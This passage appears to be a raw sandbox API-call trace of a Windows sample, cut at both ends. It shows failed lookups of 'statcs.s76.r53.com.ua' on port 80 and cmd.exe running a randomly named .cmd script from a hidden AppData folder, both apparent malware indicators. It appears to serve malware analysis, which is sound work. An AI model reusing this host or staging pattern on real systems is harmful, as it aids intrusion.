ExitProcess (uExitCode=0x0) Thread: id = 24 os_tid = 0xba0 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f8514, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0097.383] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x1431ffc, cbMultiByte=27, lpWideCharStr=0x153ed38, cchWideChar=2047 | out: lpWideCharStr="Host: statcs.s76.r53.com.ua") returned 27 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0097.383] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x13ea714, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="statcs.s76.r53.com.ua", cchWideChar=21, lpMultiByteStr=0x13f867c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="statcs.s76.r53.com.ua", lpUsedDefaultChar=0x0) returned 21 [0097.383] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x153fb8c*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x153fbac | out: ppResult=0x153fbac*=0x0) returned 11001 [0097.451] getaddrinfo (in: pNodeName="statcs.s76.r53.com.ua", pServiceName="80", pHints=0x153fb8c*(ai_flags=0, ai_family=23, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x153fbac | out: ppResult=0x153fbac*=0x0) returned 11001 [0097.545] getnameinfo (in: pSockaddr=0x153fc14, SockaddrLength=0x0, pNodeBuffer=0x134831c, NodeBufferSize=0x401, pServiceBuffer=0x1415124, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="", pServiceBuffer="") returned 10047 [0097.545] htons (hostshort=0x0) returned 0x0 [0097.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0097.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0097.545] GetCurrentThreadId () 
returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] SetEvent (hEvent=0x84) returned 1 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] GetCurrentThreadId () returned 0xba0 [0097.545] CloseHandle (hObject=0xb8) returned 1 [0097.545] RtlExitUserThread (Status=0x0) Thread: id = 26 os_tid = 0xbb0 Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168a0" os_pid = "0xb88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xae4" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1205 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1206 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 
1207 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1208 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1209 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1210 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1211 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1212 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1213 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1214 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1433 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1434 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1435 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1436 start_va = 0x2a0000 end_va = 
0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1437 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1438 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1439 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1440 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1441 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1442 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1443 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1444 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1445 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1446 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1447 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 1448 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1449 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1450 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1451 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1452 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1453 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1454 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1455 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1456 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 1470 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 
region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1471 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1472 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1473 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1474 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 21 os_tid = 0xb8c [0098.527] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22ff74 | out: lpSystemTimeAsFileTime=0x22ff74*(dwLowDateTime=0x78bc3d00, dwHighDateTime=0x1d440a9)) [0098.527] GetCurrentProcessId () returned 0xb88 [0098.527] GetCurrentThreadId () returned 0xb8c [0098.528] GetTickCount () returned 0x2387d [0098.528] QueryPerformanceCounter (in: lpPerformanceCount=0x22ff6c | out: lpPerformanceCount=0x22ff6c*=15531676113) returned 1 [0098.528] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0098.528] __set_app_type (_Type=0x1) [0098.528] __p__fmode () returned 0x76b331f4 [0098.528] __p__commode () returned 0x76b331fc [0098.529] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0098.529] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0098.529] GetCurrentThreadId () returned 
0xb8c [0098.529] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb8c) returned 0x38 [0098.529] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0098.529] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0098.529] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.530] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22ff04 | out: phkResult=0x22ff04*=0x0) returned 0x2 [0098.530] VirtualQuery (in: lpAddress=0x22ff3b, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.530] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0098.530] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0098.530] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.530] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fed4, dwLength=0x1c | out: lpBuffer=0x22fed4*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0098.530] GetConsoleOutputCP () returned 0x1b5 [0098.530] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.530] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0098.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.530] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0098.530] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.530] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0098.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0098.531] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0098.531] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.531] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0098.531] _get_osfhandle (_FileHandle=0) returned 0x3 [0098.531] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0098.531] GetEnvironmentStringsW () returned 0x390150* [0098.531] FreeEnvironmentStringsW (penv=0x390150) returned 1 [0098.532] GetEnvironmentStringsW () returned 0x390150* [0098.532] FreeEnvironmentStringsW (penv=0x390150) returned 1 [0098.532] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee74 | out: phkResult=0x22ee74*=0x40) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x0, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x1, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x1, 
lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x0, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x40, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x40, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x40, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegCloseKey (hKey=0x40) returned 0x0 [0098.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ee74 | out: phkResult=0x22ee74*=0x40) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x40, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x1, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x1, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.532] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x0, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x9, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.532] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x4, lpData=0x22ee80*=0x9, lpcbData=0x22ee78*=0x4) returned 0x0 [0098.533] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ee7c, lpData=0x22ee80, lpcbData=0x22ee78*=0x1000 | out: lpType=0x22ee7c*=0x0, lpData=0x22ee80*=0x9, lpcbData=0x22ee78*=0x1000) returned 0x2 [0098.533] RegCloseKey (hKey=0x40) returned 0x0 [0098.533] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88634b [0098.533] srand (_Seed=0x5b88634b) [0098.533] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"" [0098.533] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\DGaezHhx.cmd\"" [0098.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.533] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3919b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0098.533] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.533] GetEnvironmentVariableW (in: lpName="PATHEXT", 
lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.533] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0098.533] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.534] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.534] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0098.534] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0098.534] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0098.534] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0098.534] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0098.534] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0098.534] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0098.534] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0098.534] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fc40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.534] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fc40, lpFilePart=0x22fc3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fc3c*="Desktop") returned 0x18 [0098.534] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0098.534] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f9bc | out: lpFindFileData=0x22f9bc) returned 0x38ffe0 [0098.534] FindClose (in: hFindFile=0x38ffe0 | out: hFindFile=0x38ffe0) returned 1 [0098.534] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f9bc | out: lpFindFileData=0x22f9bc) returned 0x38ffe0 [0098.534] FindClose (in: hFindFile=0x38ffe0 | out: 
hFindFile=0x38ffe0) returned 1 [0098.535] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f9bc | out: lpFindFileData=0x22f9bc) returned 0x38ffe0 [0098.535] FindClose (in: hFindFile=0x38ffe0 | out: hFindFile=0x38ffe0) returned 1 [0098.535] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0098.535] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0098.535] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0098.535] GetEnvironmentStringsW () returned 0x390150* [0098.535] FreeEnvironmentStringsW (penv=0x390150) returned 1 [0098.535] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0098.537] GetConsoleOutputCP () returned 0x1b5 [0098.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0098.538] GetUserDefaultLCID () returned 0x409 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fd80, cchData=128 | out: lpLCData="0") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fd80, cchData=128 | out: lpLCData="0") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fd80, cchData=128 | out: lpLCData="1") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0098.538] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0098.539] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0098.539] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0098.540] GetConsoleTitleW (in: lpConsoleTitle=0x3901e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.540] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0098.540] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0098.540] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0098.540] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0098.544] _wcsicmp 